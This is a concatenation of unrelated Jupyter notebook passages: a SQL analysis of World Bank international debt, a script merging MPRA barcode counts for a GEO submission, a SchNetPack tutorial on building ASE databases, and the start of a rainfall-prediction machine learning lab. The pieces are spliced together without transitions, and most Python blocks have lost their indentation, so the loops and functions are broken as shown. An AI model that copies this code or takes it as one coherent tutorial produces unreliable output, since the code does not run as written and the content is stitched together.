<p>We can investigate this a bit more so as to find out which country owes the highest amount of debt in the category of long term debts (<code>DT.AMT.DLXF.CD</code>). Since not all the countries suffer from the same kind of economic disturbances, this finding will allow us to understand that particular country's economic condition a bit more specifically. </p>
```
%%sql
SELECT
country_name,
indicator_name,
    ROUND(debt, 2) AS maximum_debt
FROM international_debt
WHERE debt = (SELECT MAX(debt)
              FROM international_debt
              WHERE indicator_code = 'DT.AMT.DLXF.CD');
```
## 8. The most common debt indicator
<p>China has the highest amount of debt in the long-term debt (<code>DT.AMT.DLXF.CD</code>) category. This is verified by <a href="https://data.worldbank.org/indicator/DT.AMT.DLXF.CD?end=2018&most_recent_value_desc=true">The World Bank</a>. It is often a good idea to verify our analyses like this since it validates that our investigations are correct. </p>
<p>We saw that long-term debt is the topmost category when it comes to the average amount of debt. But is it the most common indicator in which the countries owe their debt? Let's find that out. </p>
```
%%sql
SELECT
indicator_name,
    COUNT(indicator_code) AS indicator_count
FROM international_debt
GROUP BY indicator_code, indicator_name
ORDER BY indicator_count DESC
LIMIT 20;
```
## 9. Other viable debt issues and conclusion
<p>There are a total of six debt indicators in which all the countries listed in our dataset have taken debt. The indicator <code>DT.AMT.DLXF.CD</code> is also there in the list. So, this gives us a clue that all these countries are suffering from a common economic issue. But that is only a part of the story, not the end of it. </p>
<p>Let's change tracks from <code>debt_indicator</code>s now and focus on the amount of debt again. Let's find out the maximum amount of debt across the indicators along with the respective country names. With this, we will be in a position to identify the other plausible economic issues a country might be going through. By the end of this section, we will have found out the debt indicators in which a country owes its highest debt. </p>
<p>In this notebook, we took a look at debt owed by countries across the globe. We extracted a few summary statistics from the data and unraveled some interesting facts and figures. We also validated our findings to make sure the investigations are correct.</p>
```
%%sql
SELECT
country_name,
indicator_code,
    ROUND(MAX(debt), 2) AS maximum_debt
FROM international_debt
GROUP BY country_name, indicator_code
ORDER BY maximum_debt DESC
LIMIT 10;
```
```
import pandas as pd
import numpy as np
HUES64_rep1_tfxn1_fs = ["../../../data/02__mpra/01__counts/07__HUES64_rep6_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/07__HUES64_rep6_lib2_BARCODES.txt"]
HUES64_rep1_tfxn2_fs = ["../../../data/02__mpra/01__counts/08__HUES64_rep7_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/08__HUES64_rep7_lib2_BARCODES.txt"]
HUES64_rep1_tfxn3_fs = ["../../../data/02__mpra/01__counts/09__HUES64_rep8_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/09__HUES64_rep8_lib2_BARCODES.txt"]
HUES64_rep2_tfxn1_fs = ["../../../data/02__mpra/01__counts/10__HUES64_rep9_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/10__HUES64_rep9_lib2_BARCODES.txt"]
HUES64_rep2_tfxn2_fs = ["../../../data/02__mpra/01__counts/11__HUES64_rep10_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/11__HUES64_rep10_lib2_BARCODES.txt"]
HUES64_rep2_tfxn3_fs = ["../../../data/02__mpra/01__counts/12__HUES64_rep11_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/12__HUES64_rep11_lib2_BARCODES.txt"]
HUES64_rep3_tfxn1_fs = ["../../../data/02__mpra/01__counts/16__HUES64_rep12_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/16__HUES64_rep12_lib2_BARCODES.txt"]
HUES64_rep3_tfxn2_fs = ["../../../data/02__mpra/01__counts/17__HUES64_rep13_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/17__HUES64_rep13_lib2_BARCODES.txt"]
HUES64_rep3_tfxn3_fs = ["../../../data/02__mpra/01__counts/18__HUES64_rep14_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/18__HUES64_rep14_lib2_BARCODES.txt"]
mESC_rep1_tfxn1_fs = ["../../../data/02__mpra/01__counts/15__mESC_rep3_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/15__mESC_rep3_lib2_BARCODES.txt"]
mESC_rep2_tfxn1_fs = ["../../../data/02__mpra/01__counts/19__mESC_rep4_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/19__mESC_rep4_lib2_BARCODES.txt",
"../../../data/02__mpra/01__counts/19__mESC_rep4_lib3_BARCODES.txt"]
mESC_rep3_tfxn1_fs = ["../../../data/02__mpra/01__counts/20__mESC_rep5_lib1_BARCODES.txt",
"../../../data/02__mpra/01__counts/20__mESC_rep5_lib2_BARCODES.txt",
"../../../data/02__mpra/01__counts/20__mESC_rep5_lib3_BARCODES.txt"]
```
## 1. import, merge, sum
### HUES64 rep 1
```
for i, f in enumerate(HUES64_rep1_tfxn1_fs):
if i == 0:
HUES64_rep1_tfxn1 = pd.read_table(f, sep="\t")
print(len(HUES64_rep1_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep1_tfxn1 = HUES64_rep1_tfxn1.merge(tmp, on="barcode")
HUES64_rep1_tfxn1["count"] = HUES64_rep1_tfxn1[["count_x", "count_y"]].sum(axis=1)
HUES64_rep1_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep1_tfxn1.head()
for i, f in enumerate(HUES64_rep1_tfxn2_fs):
if i == 0:
HUES64_rep1_tfxn2 = pd.read_table(f, sep="\t")
print(len(HUES64_rep1_tfxn2))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep1_tfxn2 = HUES64_rep1_tfxn2.merge(tmp, on="barcode")
HUES64_rep1_tfxn2["count"] = HUES64_rep1_tfxn2[["count_x", "count_y"]].sum(axis=1)
HUES64_rep1_tfxn2.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep1_tfxn2.head()
for i, f in enumerate(HUES64_rep1_tfxn3_fs):
if i == 0:
HUES64_rep1_tfxn3 = pd.read_table(f, sep="\t")
print(len(HUES64_rep1_tfxn3))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep1_tfxn3 = HUES64_rep1_tfxn3.merge(tmp, on="barcode")
HUES64_rep1_tfxn3["count"] = HUES64_rep1_tfxn3[["count_x", "count_y"]].sum(axis=1)
HUES64_rep1_tfxn3.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep1_tfxn3.head()
```
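The same merge-and-sum pattern repeats for every replicate below; it could be factored into a single helper. A hedged sketch (the function name `sum_barcode_counts` is ours, not part of the original notebook), which keeps only the running per-barcode total after each merge so any number of library files can be combined:

```python
import pandas as pd

def sum_barcode_counts(files):
    """Read each barcode count file and return one dataframe with
    per-barcode counts summed across all sequencing libraries."""
    total = None
    for f in files:
        df = pd.read_table(f, sep="\t")
        if total is None:
            total = df
        else:
            # inner merge on barcode; suffixes avoid column-name collisions
            total = total.merge(df, on="barcode", suffixes=("_a", "_b"))
            count_cols = [c for c in total.columns if c != "barcode"]
            total["count"] = total[count_cols].sum(axis=1)
            total = total[["barcode", "count"]]
    return total
```

With this, e.g. `HUES64_rep1_tfxn1 = sum_barcode_counts(HUES64_rep1_tfxn1_fs)` would replace each block above.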
### HUES64 rep 2
```
for i, f in enumerate(HUES64_rep2_tfxn1_fs):
if i == 0:
HUES64_rep2_tfxn1 = pd.read_table(f, sep="\t")
print(len(HUES64_rep2_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep2_tfxn1 = HUES64_rep2_tfxn1.merge(tmp, on="barcode")
HUES64_rep2_tfxn1["count"] = HUES64_rep2_tfxn1[["count_x", "count_y"]].sum(axis=1)
HUES64_rep2_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep2_tfxn1.head()
for i, f in enumerate(HUES64_rep2_tfxn2_fs):
if i == 0:
HUES64_rep2_tfxn2 = pd.read_table(f, sep="\t")
print(len(HUES64_rep2_tfxn2))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep2_tfxn2 = HUES64_rep2_tfxn2.merge(tmp, on="barcode")
HUES64_rep2_tfxn2["count"] = HUES64_rep2_tfxn2[["count_x", "count_y"]].sum(axis=1)
HUES64_rep2_tfxn2.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep2_tfxn2.head()
for i, f in enumerate(HUES64_rep2_tfxn3_fs):
if i == 0:
HUES64_rep2_tfxn3 = pd.read_table(f, sep="\t")
print(len(HUES64_rep2_tfxn3))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep2_tfxn3 = HUES64_rep2_tfxn3.merge(tmp, on="barcode")
HUES64_rep2_tfxn3["count"] = HUES64_rep2_tfxn3[["count_x", "count_y"]].sum(axis=1)
HUES64_rep2_tfxn3.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep2_tfxn3.head()
```
### HUES64 rep 3
```
for i, f in enumerate(HUES64_rep3_tfxn1_fs):
if i == 0:
HUES64_rep3_tfxn1 = pd.read_table(f, sep="\t")
print(len(HUES64_rep3_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep3_tfxn1 = HUES64_rep3_tfxn1.merge(tmp, on="barcode")
HUES64_rep3_tfxn1["count"] = HUES64_rep3_tfxn1[["count_x", "count_y"]].sum(axis=1)
HUES64_rep3_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep3_tfxn1.head()
for i, f in enumerate(HUES64_rep3_tfxn2_fs):
if i == 0:
HUES64_rep3_tfxn2 = pd.read_table(f, sep="\t")
print(len(HUES64_rep3_tfxn2))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep3_tfxn2 = HUES64_rep3_tfxn2.merge(tmp, on="barcode")
HUES64_rep3_tfxn2["count"] = HUES64_rep3_tfxn2[["count_x", "count_y"]].sum(axis=1)
HUES64_rep3_tfxn2.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep3_tfxn2.head()
for i, f in enumerate(HUES64_rep3_tfxn3_fs):
if i == 0:
HUES64_rep3_tfxn3 = pd.read_table(f, sep="\t")
print(len(HUES64_rep3_tfxn3))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
HUES64_rep3_tfxn3 = HUES64_rep3_tfxn3.merge(tmp, on="barcode")
HUES64_rep3_tfxn3["count"] = HUES64_rep3_tfxn3[["count_x", "count_y"]].sum(axis=1)
HUES64_rep3_tfxn3.drop(["count_x", "count_y"], axis=1, inplace=True)
HUES64_rep3_tfxn3.head()
```
### mESC rep 1
```
for i, f in enumerate(mESC_rep1_tfxn1_fs):
if i == 0:
mESC_rep1_tfxn1 = pd.read_table(f, sep="\t")
print(len(mESC_rep1_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
mESC_rep1_tfxn1 = mESC_rep1_tfxn1.merge(tmp, on="barcode")
mESC_rep1_tfxn1["count"] = mESC_rep1_tfxn1[["count_x", "count_y"]].sum(axis=1)
mESC_rep1_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
mESC_rep1_tfxn1.head()
```
### mESC rep 2
```
for i, f in enumerate(mESC_rep2_tfxn1_fs):
if i == 0:
mESC_rep2_tfxn1 = pd.read_table(f, sep="\t")
print(len(mESC_rep2_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
mESC_rep2_tfxn1 = mESC_rep2_tfxn1.merge(tmp, on="barcode")
        mESC_rep2_tfxn1["count"] = mESC_rep2_tfxn1[["count_x", "count_y"]].sum(axis=1)
mESC_rep2_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
mESC_rep2_tfxn1.head()
```
### mESC rep 3
```
for i, f in enumerate(mESC_rep3_tfxn1_fs):
if i == 0:
mESC_rep3_tfxn1 = pd.read_table(f, sep="\t")
print(len(mESC_rep3_tfxn1))
else:
tmp = pd.read_table(f, sep="\t")
print(len(tmp))
mESC_rep3_tfxn1 = mESC_rep3_tfxn1.merge(tmp, on="barcode")
        mESC_rep3_tfxn1["count"] = mESC_rep3_tfxn1[["count_x", "count_y"]].sum(axis=1)
mESC_rep3_tfxn1.drop(["count_x", "count_y"], axis=1, inplace=True)
mESC_rep3_tfxn1.head()
```
## 2. write files
```
HUES64_rep1_tfxn1.to_csv("../../../GEO_submission/MPRA__HUES64__rep1__tfxn1.BARCODES.txt", sep="\t", index=False)
HUES64_rep1_tfxn2.to_csv("../../../GEO_submission/MPRA__HUES64__rep1__tfxn2.BARCODES.txt", sep="\t", index=False)
HUES64_rep1_tfxn3.to_csv("../../../GEO_submission/MPRA__HUES64__rep1__tfxn3.BARCODES.txt", sep="\t", index=False)
HUES64_rep2_tfxn1.to_csv("../../../GEO_submission/MPRA__HUES64__rep2__tfxn1.BARCODES.txt", sep="\t", index=False)
HUES64_rep2_tfxn2.to_csv("../../../GEO_submission/MPRA__HUES64__rep2__tfxn2.BARCODES.txt", sep="\t", index=False)
HUES64_rep2_tfxn3.to_csv("../../../GEO_submission/MPRA__HUES64__rep2__tfxn3.BARCODES.txt", sep="\t", index=False)
HUES64_rep3_tfxn1.to_csv("../../../GEO_submission/MPRA__HUES64__rep3__tfxn1.BARCODES.txt", sep="\t", index=False)
HUES64_rep3_tfxn2.to_csv("../../../GEO_submission/MPRA__HUES64__rep3__tfxn2.BARCODES.txt", sep="\t", index=False)
HUES64_rep3_tfxn3.to_csv("../../../GEO_submission/MPRA__HUES64__rep3__tfxn3.BARCODES.txt", sep="\t", index=False)
mESC_rep1_tfxn1.to_csv("../../../GEO_submission/MPRA__mESC__rep1__tfxn1.BARCODES.txt", sep="\t", index=False)
mESC_rep2_tfxn1.to_csv("../../../GEO_submission/MPRA__mESC__rep2__tfxn1.BARCODES.txt", sep="\t", index=False)
mESC_rep3_tfxn1.to_csv("../../../GEO_submission/MPRA__mESC__rep3__tfxn1.BARCODES.txt", sep="\t", index=False)
```
# Preparing and loading your data
This tutorial introduces how SchNetPack stores and loads data.
Before we can start training neural networks with SchNetPack, we need to prepare our data.
This is because SchNetPack has to stream the reference data from disk during training in order to be able to handle large datasets.
Therefore, it is crucial to use a data format that allows for fast random read access.
We found that the [ASE database format](https://wiki.fysik.dtu.dk/ase/ase/db/db.html) fulfills these requirements perfectly.
To further improve the performance, we internally encode properties in binary.
However, as long as you only access the ASE database via the provided SchNetPack `AtomsData` class, you don't have to worry about that.
```
from schnetpack import AtomsData
```
## Predefined datasets
SchNetPack supports several benchmark datasets that can be used without preparation.
Each one can be accessed using a corresponding class that inherits from `DownloadableAtomsData`, which supports automatic download and conversion. Here, we show how to use these datasets, using the QM9 benchmark as an example.
First, we have to import the dataset class and instantiate it. This will automatically download the data to the specified location.
```
from schnetpack.datasets import QM9
qm9data = QM9('./qm9.db', download=True)
```
Let's have a closer look at this dataset.
We can find out how large it is and which properties it supports:
```
print('Number of reference calculations:', len(qm9data))
print('Available properties:')
for p in qm9data.available_properties:
print('-', p)
```
We can load data points using zero-based indexing. The result is a dictionary containing the geometry and properties:
```
example = qm9data[0]
print('Properties:')
for k, v in example.items():
print('-', k, ':', v.shape)
```
We see that all available properties have been loaded as torch tensors with the given shapes. Keys with an underscore indicate that these names are reserved for internal use. This includes the geometry (`_atomic_numbers`, `_positions`, `_cell`), the index within the dataset (`_idx`) as well as information about neighboring atoms and periodic boundary conditions (`_neighbors`, `_cell_offset`).
<div class="alert alert-info">
**Note:** Neighbors are collected using an `EnvironmentProvider`, that can be passed to the `AtomsData` constructor. The default is the `SimpleEnvironmentProvider`, which constructs the neighbor list using a full distance matrix. This is suitable for small molecules. We supply environment providers using a cutoff (`AseEnvironmentProvider`, `TorchEnvironmentProvider`) that are able to handle larger molecules and periodic boundary conditions.
</div>
We can directly obtain an ASE atoms object as follows:
```
at = qm9data.get_atoms(idx=0)
print('Atoms object:', at)
at2, props = qm9data.get_properties(idx=0)
print('Atoms object (not the same):', at2)
print('Equivalent:', at2 == at, '; not the same object:', at2 is at)
```
Alternatively, all property names are pre-defined as class variables for convenient access:
```
print('Total energy at 0K:', props[QM9.U0])
print('HOMO:', props[QM9.homo])
```
## Preparing your own data
In the following we will create an ASE database from our own data.
For this tutorial, we will use a dataset containing a molecular dynamics (MD) trajectory of ethanol, which can be downloaded [here](http://quantum-machine.org/gdml/data/xyz/ethanol_dft.zip).
```
import os
if not os.path.exists('./ethanol_dft.zip'):
!wget http://quantum-machine.org/gdml/data/xyz/ethanol_dft.zip
if not os.path.exists('./ethanol.xyz'):
!unzip ./ethanol_dft.zip
```
The data set is in xyz format with the total energy given in the comment row. For this kind of data, we supply a script that converts it into the SchNetPack ASE DB format.
```
!schnetpack_parse.py ./ethanol.xyz ./ethanol.db
```
In the following, we show how this can be done in general, so that you apply this to any other data format.
First, we need to parse our data. For this we use the IO functionality supplied by ASE.
In order to create a SchNetPack DB, we require a **list of ASE `Atoms` objects** as well as a corresponding **list of dictionaries** `[{property_name1: property1_molecule1}, {property_name1: property1_molecule2}, ...]` containing the mapping from property names to values.
```
from ase.io import read
import numpy as np
# load atoms from xyz file. Here, we only parse the first 10 molecules
atoms = read('./ethanol.xyz', index=':10')
# the xyz comment line is stored by ASE as a key of the info dictionary; here it holds the energy
print('Energy:', atoms[0].info)
print()
# parse properties as list of dictionaries
property_list = []
for at in atoms:
# All properties need to be stored as numpy arrays.
# Note: The shape for scalars should be (1,), not ()
# Note: GPUs work best with float32 data
energy = np.array([float(list(at.info.keys())[0])], dtype=np.float32)
property_list.append(
{'energy': energy}
)
print('Properties:', property_list)
```
Once we have our data in this format, it is straightforward to create a new SchNetPack DB and store it.
```
%rm './new_dataset.db'
new_dataset = AtomsData('./new_dataset.db', available_properties=['energy'])
new_dataset.add_systems(atoms, property_list)
```
Now we can have a look at the data in the same way we did before for QM9:
```
print('Number of reference calculations:', len(new_dataset))
print('Available properties:')
for p in new_dataset.available_properties:
print('-', p)
print()
example = new_dataset[0]
print('Properties of molecule with id 0:')
for k, v in example.items():
print('-', k, ':', v.shape)
```
In the same way, we can store multiple properties, including atomic properties such as forces, or tensorial properties such as polarizability tensors.
In the following tutorials, we will describe how these datasets can be used to train neural networks.
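Before such properties go into the database, the arrays must have the right shape and dtype. A minimal numpy sketch of shaping a scalar energy and per-atom forces (the numeric values here are made up for illustration):

```python
import numpy as np

n_atoms = 9  # ethanol (C2H5OH) has 9 atoms
# scalar properties get shape (1,), not () — and float32 works best on GPUs
energy = np.array([-97208.40], dtype=np.float32)
# per-atom vector properties such as forces get shape (n_atoms, 3)
forces = np.zeros((n_atoms, 3), dtype=np.float32)
properties = {"energy": energy, "forces": forces}
```

A dictionary like this would then be appended to the property list for each molecule, exactly as we did for `energy` above.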
```
### ATOC5860 Application Lab #6 - supervised machine learning
### Coded by Eleanor Middlemas (Jupiter, formerly University of Colorado, elmiddlemas at gmail.com)
### Additional code/commenting by Jennifer Kay (University of Colorado)
### Last updated April 6, 2022
import pandas as pd
import numpy as np
import datetime
import time
```
*In this notebook, we will use supervised machine learning models to:*
**1) Predict the likelihood of rainfall given certain atmospheric conditions.**
After prepping the data, we will build and train four machine learning models to make the predictions: logistic regression, random forest, support vector machine/classifier, and a neural network.
**2) Determine which variable ("feature") is the best predictor of rainfall, i.e., "feature importance"**
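As a preview of goal (2), feature importance can be read directly off a fitted tree ensemble. A toy sketch on synthetic data (everything here is made up; it is not the Christman dataset):

```python
import numpy as np
from sklearn.ensemble import RandomForestClassifier

rng = np.random.default_rng(0)
X = rng.normal(size=(500, 3))      # three candidate "features"
y = (X[:, 0] > 0).astype(int)      # outcome depends only on feature 0

model = RandomForestClassifier(n_estimators=50, random_state=0).fit(X, y)
# importances are normalized to sum to 1; the informative feature dominates
print(model.feature_importances_)
```

We will do the same kind of inspection with the real rainfall features once the models are trained.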
## STEP 1: Read in the Data into a pandas dataframe and Look At It
```
# read in the data
df = pd.read_csv("christman_2016.csv")
# preview data (also through df.head() & df.tail())
df
df.day.nunique() ## Print the answer to: How many days are in this dataset?
##Optional: transform the day column into a readable date. Run this ONCE.
df['day'] = [datetime.date.fromordinal(day+693594) for day in df['day']]
```
## STEP 2: Data and Function Preparation
Data preparation is a huge part of building Machine Learning model "pipelines". Carefully think through building & training a Machine Learning model before you run it. There are a few statistical "gotchas" that may result in your model being biased, inaccurate, or not suitable for the problem at hand. Address these seven questions!
**Q1: What exactly are we trying to predict? A value, an outcome, a category?** Define your predictors and predictand. Relate these to your hypothesis or overarching question. In our case, our predictand is the likelihood of precipitation. We will build models to predict the likelihood that it's currently precipitating, given current atmospheric conditions.
**Q2: Do you have any missing data? If so, how will you handle them?** Keep in mind, decreasing the number of input observations may bias your model. Using the Christman dataset, we have no missing data.
**Q3: Do you have any categorical or non-numeric variables or features?** If so, you must figure out how to encode them into numbers. Luckily, in the geosciences, we rarely run into this problem.
**Q4: How will we validate our model?** Typically, people split their existing data into training data and testing data, or perform "cross-validation" or a "test-train split". That is, we will "hold out" some data and call it our "testing data", while using the rest of the data to train our model (i.e., "training data"). Once our model is trained, we will evaluate its performance with the holdout testing data. Note: This could be problematic if there is limited data.
**Q5: Do your features have the same variance?** You need to consider this to ensure your model doesn't overly depend on one variable with large variance. This step is called "feature scaling". Features of the same size also speed up the Gradient Descent algorithm.
**Q6: If classification is the goal, are there the same number of observations for each feature and outcome? If not, how will you rebalance?** Here, the Christman dataset has the same number of observations (8784) for each feature. But, times with no precipitation are way more common than times with precipitation. To deal with this issue, we will oversample the observations associated with precip so that the two outcomes (or "classes") are equal. Note: It's important that feature scaling or normalization is performed before any rebalancing so that the qualitative statistics (mean, standard deviation, etc.) remain the same.
**Q7: Which metrics are appropriate for assessing your model?** Consider the bias-variance trade-off, and whether having false positives or false negatives is more impactful. In our case, predicting no rain when there is rain (false negative) is probably more frustrating and potentially more impactful than the other way around (a false positive).
**Q1. What exactly are you trying to predict?**
First, split data into predictor & predictands.
```
##Create a new feature that indicates whether precipitation occurred. Perform this step ONCE.
#print(df.columns) # print if you need to see what is the variable called that indicates precipitation amount?
df['prec_occur'] = np.array(df.Prec_inches!=0).astype(int)
#Next, select the data that will be predictors.
predictors = df.copy(deep=True) # here, we use "deep = True" so that changes to predictors won't be made to the df.
#Next, we drop some variables that shouldn't be used to predict whether or not there is rain.
predictors = predictors.drop(['day','hour','Prec_inches'],axis=1)
predictors
## Great, that worked. Now I will assign everything but "prec" to be the predictor array "x",
## and prec will be the predictand vector "y".
x = predictors.drop('prec_occur',axis=1)
y = predictors.prec_occur
```
**Q2 & Q3 do not need to be addressed in our dataset.**
**Q4. How will you validate your model?**
We will perform a test-train split to validate our trained model. This step must be performed before each time the model is trained to ensure we are not baking in any bias among the models we train. That also means the following two steps must also be performed prior to training each model. For this reason, we write functions that can be called easily before each model training.
```
from sklearn.model_selection import train_test_split
from random import randint
def define_holdout_data(x, y, verbose):
"""Perform a 80/20 test-train split (80% of data is training, 20% is testing). Split is randomized with each call."""
random_state = randint(0,1000)
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.20, random_state=random_state)
if verbose==True:
        print("Prior to scaling and rebalancing...")
print("Shape of training predictors: "+str(np.shape(x_train)))
print("Shape of testing predictors: "+str(np.shape(x_test)))
print("Shape of training predictands: "+str(np.shape(y_train)))
print("Shape of testing predictands: "+str(np.shape(y_test)))
print(" ")
return x_train, x_test, y_train, y_test
```
**Q5. Do your features have the same variance?**
We must normalize the features. In machine learning this is called "feature scaling". We do this so that the features with the largest variance are not weighted more heavily than those with less variance. Note: If our predictand weren't binary, then we would normalize it as well.
We'll keep the data as a pandas dataframe rather than converting it to a numpy array beforehand. The "fit_transform" function outputs a numpy array, but we will convert back to a dataframe so that re-balancing the dataset is easier.
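What `MinMaxScaler` computes can be sketched by hand in numpy (toy numbers): each column is mapped onto [0, 1] using its own minimum and maximum.

```python
import numpy as np

x = np.array([[10.0, 0.1],
              [20.0, 0.2],
              [30.0, 0.4]])
# per-column min-max scaling: (x - min) / (max - min)
x_scaled = (x - x.min(axis=0)) / (x.max(axis=0) - x.min(axis=0))
```

The sklearn version below additionally remembers the training-set min and max, so the same transform can be reapplied to the test data.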
```
from sklearn import preprocessing
def scale_data(x_train, x_test):
"""
Scale training data so that model reaches optimized weights much faster.
*All data that enters the model should use the same scaling used to scale the training data.*
Thus, we also perform scaling on testing data for validation later.
Additionally, we return the scaler used to scale any other future input data.
"""
scaler = preprocessing.MinMaxScaler() # normalize
x_train_scaled = pd.DataFrame(data=scaler.fit_transform(x_train),index=x_train.index,columns=x_train.columns)
x_test_scaled = pd.DataFrame(data=scaler.transform(x_test),index=x_test.index,columns=x_test.columns)
return scaler, x_train_scaled, x_test_scaled
```
**Q6. Are there the same number of observations for each outcome or class?**
Luckily, we have the same number of observations for each feature (8784). But do we have the same number of outcomes for our predictand?
```
df['prec_occur'].value_counts()
```
**Answer:** Definitely not. The outcomes we are trying to predict are extremely unbalanced. Non-precip hours occur 30x more than precip hours. This class imbalance may bias the model because precip hours are underrepresented: the model won't see enough instances of precip hours to learn to distinguish them from non-precip hours.
There are a number of out-of-the-box functions that resample data very precisely. The one I use below simply randomly oversamples the existing precipitating observation data to balance the dataset.
Note: This function should be called on both training and testing data separately.
```
from sklearn.utils import resample
def balance_data(x,y,verbose):
    """Resample data to ensure the model is not biased towards a particular outcome of precip or no precip."""
# Combine again to one dataframe to ensure both the predictor and predictand are resampled from the same
# observations based on predictand outcomes.
dataset = pd.concat([x, y],axis=1)
# Separating classes
raining = dataset[dataset['prec_occur'] == 1]
not_raining = dataset[dataset['prec_occur'] == 0]
random_state = randint(0,1000)
oversample = resample(raining,
replace=True,
n_samples=len(not_raining), #set the number of samples to equal the number of the majority class
random_state=random_state)
# Returning to new training set
oversample_dataset = pd.concat([not_raining, oversample])
# reseparate oversampled data into X and y sets
x_bal = oversample_dataset.drop(['prec_occur'], axis=1)
y_bal = oversample_dataset['prec_occur']
if verbose==True:
        print("After scaling and rebalancing...")
print("Shape of predictors: "+str(np.shape(x_bal)))
print("Shape of predictands: "+str(np.shape(y_bal)))
print(" ")
return x_bal, y_bal
```
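The oversampling step above can also be sketched with plain pandas `DataFrame.sample`, a hedged stand-in for `sklearn.utils.resample` (toy data, not the Christman observations):

```python
import pandas as pd

# toy dataset: 3 raining hours, 9 non-raining hours
df = pd.DataFrame({"x": range(12), "prec_occur": [1, 0, 0, 0] * 3})
raining = df[df["prec_occur"] == 1]
not_raining = df[df["prec_occur"] == 0]

# sample the minority class with replacement up to the majority-class size
oversampled = raining.sample(n=len(not_raining), replace=True, random_state=0)
balanced = pd.concat([not_raining, oversampled])
print(balanced["prec_occur"].value_counts())
```

Either way, the balanced frame has equal counts of the two classes before it is handed to the model.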
**For ease, let's put the data prep code from questions 1-6 into a pipeline. In other words we will write a single function to accomplish everything we have done so far in this notebook.**
```
def dataprep_pipeline(x, y, verbose):
""" Combines all the functions defined above so that the user only has to
call one function to do all data pre-processing. """
# verbose=True prints the shapes of input & output data
# split into training & testing data
x_train, x_test, y_train, y_test = define_holdout_data(x, y, verbose)
# perform feature scaling
scaler, x_train_scaled, x_test_scaled = scale_data(x_train, x_test)
# rebalance according to outcomes (i.e., the number of precipitating
# observations & non-precipitating outcomes should be equal)
if verbose==True:
print("for training data... ")
x_train_bal, y_train_bal = balance_data(x_train_scaled, y_train, verbose)
if verbose==True:
print("for testing data... ")
x_test_bal, y_test_bal = balance_data(x_test_scaled, y_test, verbose)
return x_train_bal, y_train_bal, x_test_bal, y_test_bal
```
**Q7. What are the appropriate metrics for assessing your model?**
These metrics will be used to evaluate each model after training.
Below are some commonly-used metrics for assessing the value of a given Machine Learning model.
**True Positive (TP)**: the number of times the model predicts a positive when the observation is actually positive. In our case, the model predicts that it's raining when it is actually raining.<br>
**False Positive (FP)**: the number of times the model guesses that it's raining when it's not actually raining.<br>
The same applies to **True Negatives (TN)** (correctly predicting that it's not raining) and **False Negatives (FN)** (predicting no rain when it's actually raining).
- **Precision = TP/(TP + FP)**: The proportion of predicted precipitating events that are actually precipitating.
- **Accuracy = (TP + TN)/(total)**: The proportion of all hours, precipitating or not, that are correctly predicted by the model.
- **Recall = TP/(TP + FN)**: The proportion of precipitating hours that are correctly predicted by the model.<br>
<br>
Other important metrics that we aren't going to look at today:
- **F1**: the harmonic mean of precision and recall; a way to capture how well the model predicts the hours when it's actually precipitating.
- **ROC/AUC**: how well the model separates precipitating hours from non-precipitating hours.
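Though we won't use F1 or ROC-AUC below, both are readily available in scikit-learn; here is a quick sketch on made-up labels (the toy values are purely illustrative):

```python
from sklearn.metrics import f1_score, roc_auc_score

# toy labels and scores, made up purely for illustration
y_true = [1, 0, 1, 1, 0]
y_pred = [1, 0, 1, 0, 1]              # hard class predictions -> F1
y_score = [0.9, 0.2, 0.6, 0.4, 0.7]   # predicted probabilities -> ROC-AUC

print(round(f1_score(y_true, y_pred), 4))      # harmonic mean of precision & recall
print(round(roc_auc_score(y_true, y_score), 4))
```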
```
from sklearn import metrics
from sklearn.metrics import accuracy_score, f1_score, precision_score, recall_score, roc_auc_score, confusion_matrix
import matplotlib.pyplot as plt
import seaborn as sns
# Print rounded metrics for each model.
def bin_metrics(x, y):
"""Prints accuracy and recall metrics for evaluating
classification predictions."""
accuracy = metrics.accuracy_score(x, y)
recall = metrics.recall_score(x, y)
print('Accuracy:', round(accuracy, 4))
print('Recall:', round(recall, 4))
return accuracy, recall
# Plot confusion matrix
def plot_cm(x, y):
"""Plots the confusion matrix to visualize true
& false positives & negatives"""
cm = confusion_matrix(x, y)
df_cm = pd.DataFrame(cm, columns=np.unique(x), index = np.unique(x))
df_cm.index.name = 'Actual'
df_cm.columns.name = 'Predicted'
sns.heatmap(df_cm, cmap="Blues", annot=True,annot_kws={"size": 25}, fmt='g')# font size
plt.ylim([0, 2])
plt.xticks([0.5, 1.5], ['Negatives','Positives'])
